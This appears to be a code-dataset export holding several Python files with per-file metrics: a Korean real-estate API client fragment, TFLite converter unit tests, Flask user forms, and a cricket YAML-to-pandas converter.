cols = df.columns.drop(['법정동','거래일','시군구','용도지역','지목','지분거래구분'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def BizTrade(self, LAWD_CD, DEAL_YMD):
'''
12 상업업무용 부동산 매매 신고 자료 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlBizTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['거래금액','건물면적','건물주용도','건축년도','구분','년','월','일','대지면적','법정동','시군구','용도지역','유형','지역코드','층']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[거래금액,건물면적,건물주용도,건축년도,구분,년,월,일,대지면적,법정동,시군구,용도지역,유형,지역코드,층]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','용도지역','유형','대지면적','구분','건물면적','건물주용도','건축년도','층','거래금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','시군구','용도지역','유형','건물주용도'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
| 35.889273 | 219 | 0.440417 | 4,360 | 41,488 | 4.134633 | 0.081881 | 0.013591 | 0.017085 | 0.027736 | 0.834914 | 0.809064 | 0.801853 | 0.798857 | 0.796416 | 0.794586 | 0 | 0.014029 | 0.414144 | 41,488 | 1,155 | 220 | 35.920346 | 0.727639 | 0.092557 | 0 | 0.756923 | 0 | 0.02 | 0.154595 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023077 | false | 0.018462 | 0.007692 | 0 | 0.053846 | 0.06 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ebf9795d24d63445e064b81ec744c1b3f54413a3 | 35 | py | Python | tools/demoRound.py | nguyenquanghieu2000d/PlateDetectApp | 3145394fb12fbe831a3f94f33b3278b705da86c0 | [
"Apache-2.0"
] | 2 | 2021-06-25T17:48:15.000Z | 2021-06-25T17:55:49.000Z | tools/demoRound.py | nguyenquanghieu2000d/PlateDetectApp | 3145394fb12fbe831a3f94f33b3278b705da86c0 | [
"Apache-2.0"
] | null | null | null | tools/demoRound.py | nguyenquanghieu2000d/PlateDetectApp | 3145394fb12fbe831a3f94f33b3278b705da86c0 | [
"Apache-2.0"
] | null | null | null | print(round(1231234.2345345345, 2)) | 35 | 35 | 0.8 | 5 | 35 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.529412 | 0.028571 | 35 | 1 | 35 | 35 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
88ec8f64911e3b18f1b6c9586a034ad50abd3756 | 20,862 | py | Python | tests/converter_unit_test.py | steven9046/TinyNeuralNetwork | 98789fe2ea8da95f4ad16609541a00ff16e34e5e | [
"MIT"
] | 1 | 2022-01-11T06:40:13.000Z | 2022-01-11T06:40:13.000Z | tests/converter_unit_test.py | steven9046/TinyNeuralNetwork | 98789fe2ea8da95f4ad16609541a00ff16e34e5e | [
"MIT"
] | null | null | null | tests/converter_unit_test.py | steven9046/TinyNeuralNetwork | 98789fe2ea8da95f4ad16609541a00ff16e34e5e | [
"MIT"
] | null | null | null | import unittest
import tflite
import torch
import torch.nn as nn
import torch.nn.functional as F
from tinynn.converter import TFLiteConverter
def parse_model(path):
with open(path, 'rb') as f:
buf = f.read()
model = tflite.Model.GetRootAsModel(buf, 0)
return model
def get_model_path():
size = getattr(get_model_path, 'size', 0)
model_path = f'out/converter_test_{size}.tflite'
setattr(get_model_path, 'size', size + 1)
return model_path
class ConverterOptimizerTester(unittest.TestCase):
def test_tuple_output(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.split(x, 1, 1)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertIn(tfl_model.OperatorCodes(0).BuiltinCode(),
(tflite.BuiltinOperator.SPLIT_V, tflite.BuiltinOperator.SPLIT))
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 3)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 3)
def test_repeated_list_output(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.split(x, 1, 1)
return list(y) + list(y)
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertIn(tfl_model.OperatorCodes(0).BuiltinCode(),
(tflite.BuiltinOperator.SPLIT_V, tflite.BuiltinOperator.SPLIT))
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 6)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 3)
def test_input_output_with_noop(self):
class TestModel(nn.Module):
def forward(self, x):
y = x.view(x.shape)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RESHAPE)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_branch_output_with_noop(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.split(x, 1, 1)
return [t.view(t.shape) for t in y]
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertIn(tfl_model.OperatorCodes(0).BuiltinCode(),
(tflite.BuiltinOperator.SPLIT_V, tflite.BuiltinOperator.SPLIT))
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 3)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 3)
def test_branch_output_with_noop_complex(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.split(x, 1, 1)
left = [t.view(t.shape) for t in y]
right = [F.relu(t) for t in y]
return list(y) + left + right
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
# TODO: Optimize this case
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 10)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 9)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 10)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 3)
split_output_indices = tfl_model.Subgraphs(0).Operators(0).OutputsAsNumpy().tolist()
split_output_names = [tfl_model.Subgraphs(0).Tensors(i).Name() for i in split_output_indices]
for i in range(1, 10):
input_idx = tfl_model.Subgraphs(0).Operators(i).Inputs(0)
input_name = tfl_model.Subgraphs(0).Tensors(input_idx).Name()
self.assertIn(input_name, split_output_names)
def test_simple_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.permute(x, [0, 2, 3, 1])
y = torch.permute(y, [0, 3, 1, 2])
y = F.relu(y)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RELU)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_unary_elementwise_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.permute(x, [0, 2, 3, 1])
y = F.relu(y)
y = torch.permute(y, [0, 3, 1, 2])
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RELU)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_binary_elementwise_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.permute(x, [0, 2, 3, 1])
y = torch.add(y, y)
y = torch.permute(y, [0, 3, 1, 2])
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.ADD)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_simple_reshape(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.reshape(x, (3, 224, 224))
y = torch.reshape(y, (1, 3, 224, 224))
y = F.relu(y)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RELU)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_unary_elementwise_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.reshape(x, (3, 224, 224))
y = F.relu(y)
y = torch.reshape(y, (1, 3, 224, 224))
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RELU)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_binary_elementwise_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.reshape(x, (3, 224, 224))
y = torch.add(y, y)
y = torch.reshape(y, (1, 3, 224, 224))
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.ADD)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_pad_with_paired_reshape_and_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.permute(x, [0, 2, 3, 1])
y = torch.reshape(y, (224, 224, 3))
y = F.pad(y, (1, 1), "constant", 0)
y = torch.reshape(y, (1, 224, 224, 5))
y = torch.permute(y, [0, 3, 1, 2])
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.PAD)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_fold_buffer(self):
class TestModel(nn.Module):
def __init__(self) -> None:
super().__init__()
self.register_parameter('weight', nn.Parameter(torch.randn(50, 40, dtype=torch.float32)))
self.register_parameter('bias', nn.Parameter(torch.randn(40, dtype=torch.float32)))
def forward(self, x):
y = torch.addmm(self.bias, x, self.weight)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.FULLY_CONNECTED)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_fold_shared_buffer(self):
class TestModel(nn.Module):
def __init__(self) -> None:
super().__init__()
self.register_parameter('weight', nn.Parameter(torch.randn(50, 40, dtype=torch.float32)))
self.register_parameter('bias', nn.Parameter(torch.randn(40, dtype=torch.float32)))
def forward(self, x):
y = torch.cat([torch.addmm(self.bias, x, self.weight) for _ in range(5)], dim=0)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 6)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 6)
for i in range(5):
self.assertEqual(tfl_model.OperatorCodes(tfl_model.Subgraphs(0).Operators(
i).OpcodeIndex()).BuiltinCode(), tflite.BuiltinOperator.FULLY_CONNECTED)
self.assertEqual(tfl_model.Subgraphs(0).Operators(i).OutputsLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(tfl_model.Subgraphs(0).Operators(
5).OpcodeIndex()).BuiltinCode(), tflite.BuiltinOperator.CONCATENATION)
self.assertEqual(tfl_model.Subgraphs(0).Operators(5).OutputsLength(), 1)
def test_fuse_activation(self):
class TestModel(nn.Module):
def forward(self, x):
y = F.relu(x + 1)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.ADD)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
builtin_opts = tfl_model.Subgraphs(0).Operators(0).BuiltinOptions()
self.assertIsNotNone(builtin_opts)
opts = tflite.FullyConnectedOptions()
opts.Init(builtin_opts.Bytes, builtin_opts.Pos)
self.assertEqual(opts.FusedActivationFunction(), tflite.ActivationFunctionType.RELU)
def test_fuse_matmul_add(self):
class TestModel(nn.Module):
def __init__(self) -> None:
super().__init__()
self.register_parameter('weight', nn.Parameter(torch.randn(50, 40, dtype=torch.float32)))
self.register_parameter('bias', nn.Parameter(torch.randn(40, dtype=torch.float32)))
def forward(self, x):
y = torch.matmul(x, self.weight)
y = torch.add(y, self.bias)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.FULLY_CONNECTED)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).InputsLength(), 3)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_fuse_mm_add(self):
class TestModel(nn.Module):
def __init__(self) -> None:
super().__init__()
self.register_parameter('weight', nn.Parameter(torch.randn(50, 40, dtype=torch.float32)))
self.register_parameter('bias', nn.Parameter(torch.randn(40, dtype=torch.float32)))
def forward(self, x):
y = torch.mm(x, self.weight)
y = torch.add(y, self.bias)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.FULLY_CONNECTED)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).InputsLength(), 3)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
if __name__ == '__main__':
unittest.main()
| 40.986248 | 106 | 0.640974 | 2,438 | 20,862 | 5.306809 | 0.059475 | 0.089658 | 0.164168 | 0.20977 | 0.912815 | 0.905395 | 0.895115 | 0.88128 | 0.876411 | 0.871077 | 0 | 0.030884 | 0.237945 | 20,862 | 508 | 107 | 41.066929 | 0.782929 | 0.00115 | 0 | 0.823678 | 0 | 0 | 0.004703 | 0.001536 | 0 | 0 | 0 | 0.001969 | 0.312343 | 1 | 0.100756 | false | 0 | 0.015113 | 0 | 0.209068 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0036b524faa6f5bf7b1000f7380d87e0ab72ae4a | 3,269 | py | Python | real_estate_analysis/app/app/users/forms.py | enyquist/Real_Estate_Analysis | 47bbcfbc9bece20ae2aa0fce84dfca700ec6842f | [
"MIT"
] | null | null | null | real_estate_analysis/app/app/users/forms.py | enyquist/Real_Estate_Analysis | 47bbcfbc9bece20ae2aa0fce84dfca700ec6842f | [
"MIT"
] | null | null | null | real_estate_analysis/app/app/users/forms.py | enyquist/Real_Estate_Analysis | 47bbcfbc9bece20ae2aa0fce84dfca700ec6842f | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from flask_login import current_user
import wtforms as forms
import wtforms.validators as validators
import real_estate_analysis.app.app.models as models
class RegistrationForm(FlaskForm):
username = forms.StringField(label='Username', validators=[validators.DataRequired(), validators.Length(min=2, max=20)])
email = forms.StringField(label='Email', validators=[validators.DataRequired(), validators.Email()])
password = forms.PasswordField(label='Password', validators=[validators.DataRequired()])
confirm_password = forms.PasswordField(label='Confirm Password', validators=[validators.DataRequired(), validators.EqualTo('password')])
submit = forms.SubmitField(label='Sign Up')
def validate_username(self, username):
user = models.User.query.filter_by(username=username.data).first()
if user:
raise validators.ValidationError('That username is taken. Please choose a different username')
def validate_email(self, email):
user = models.User.query.filter_by(email=email.data).first()
if user:
raise validators.ValidationError('That email is taken. Please choose a different email')
class LoginForm(FlaskForm):
email = forms.StringField(label='Email', validators=[validators.DataRequired(), validators.Email()])
password = forms.PasswordField(label='Password', validators=[validators.DataRequired()])
remember = forms.BooleanField(label='Remember Me')
submit = forms.SubmitField(label='Login')
class UpdateAccountForm(FlaskForm):
username = forms.StringField(label='Username', validators=[validators.DataRequired(), validators.Length(min=2, max=20)])
email = forms.StringField(label='Email', validators=[validators.DataRequired(), validators.Email()])
submit = forms.SubmitField(label='Update')
def validate_username(self, username):
if username.data != current_user.username:
user = models.User.query.filter_by(username=username.data).first()
if user:
raise validators.ValidationError('That username is taken. Please choose a different username')
def validate_email(self, email):
if email.data != current_user.email:
user = models.User.query.filter_by(email=email.data).first()
if user:
raise validators.ValidationError('That email is taken. Please choose a different email')
class RequestResetForm(FlaskForm):
email = forms.StringField(label='Email', validators=[validators.DataRequired(), validators.Email()])
submit = forms.SubmitField(label='Request Password Request')
def validate_email(self, email):
user = models.User.query.filter_by(email=email.data).first()
if user is None:
raise validators.ValidationError('There is no account with the provided email. Please register for an account')
class ResetPasswordForm(FlaskForm):
password = forms.PasswordField(label='Password', validators=[validators.DataRequired()])
confirm_password = forms.PasswordField(label='Confirm Password',
validators=[validators.DataRequired(), validators.EqualTo('password')])
submit = forms.SubmitField(label='Reset Password')
| 48.791045 | 140 | 0.719486 | 360 | 3,269 | 6.480556 | 0.208333 | 0.094299 | 0.150879 | 0.144021 | 0.777111 | 0.753965 | 0.753965 | 0.753965 | 0.753965 | 0.753965 | 0 | 0.002199 | 0.165188 | 3,269 | 66 | 141 | 49.530303 | 0.852693 | 0 | 0 | 0.54 | 0 | 0 | 0.143775 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.18 | 0.1 | 0 | 0.64 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
cc4b6cbc57e06f981a1195c9b3fc6758d9d78f85 | 171,714 | py | Python | yorkpy/analytics.py | tvganesh/yorkpy | bf555a702c5d2c7d779c84d0dcf707c6d9a84bb9 | [
"MIT"
] | 4 | 2018-12-28T06:43:16.000Z | 2020-04-01T08:29:56.000Z | yorkpy/analytics.py | tvganesh/yorkpy | bf555a702c5d2c7d779c84d0dcf707c6d9a84bb9 | [
"MIT"
] | 5 | 2019-08-19T21:33:28.000Z | 2020-07-20T05:37:35.000Z | build/lib/yorkpy/analytics.py | tvganesh/yorkpy | bf555a702c5d2c7d779c84d0dcf707c6d9a84bb9 | [
"MIT"
] | 4 | 2019-03-18T05:51:26.000Z | 2020-11-29T18:11:39.000Z | import os
import yaml
import json
import pandas as pd
import matplotlib.pyplot as plt
from pylab import rcParams
import seaborn as sns
import numpy as np
from sklearn.linear_model import LinearRegression
import glob
import time
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: convertYaml2PandasDataframeT20
# This function converts yaml files to Pandas dataframe and saves as CSV
#
###########################################################################################
def convertYaml2PandasDataframeT20(infile,source,dest):
'''
Converts and save T20 yaml files to pandasdataframes
Description
This function coverts all T20 Yaml files from source directory to pandas ata frames.
The data frames are then stored as .csv files The saved file is of the format
team1-team2-date.csv For e.g. Kolkata Knight Riders-Sunrisers Hyderabad-2016-05-22.csv etc
Usage
convertYaml2PandasDataframeT20(yamlFile,sourceDir=".",targetDir=".")
Arguments
yamlFile
The yaml file to be converted to dataframe and saved
sourceDir
The source directory of the yaml file
targetDir
The target directory in which the data frame is stored as RData file
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
convertYaml2PandasDataframeT20
Examples
# In the example below ../yamldir c
convertYaml2PandasDataframeT20("225171.yaml",".","../data")
'''
os.chdir(source)
os.path.join(source,infile)
# Read Yaml file and convert to json
print('Converting file:',infile)
with open(infile) as f:
a=yaml.load(f)
# 1st innings
deliveries=a['innings'][0]['1st innings']['deliveries']
#Create empty dataframe for team1
team1=pd.DataFrame()
# Loop through all the deliveries of 1st innings and append each row to dataframe
for i in range(len(deliveries)):
df = pd.DataFrame(deliveries[i])
b= df.T
team1=pd.concat([team1,b])
# Rename batsman to striker/non-striker as there is another column batsman who scored runs
team1=team1.rename(columns={'batsman':'striker'})
# All extras column names
extras=[0,'wides','byes','legbyes','noballs','penalty']
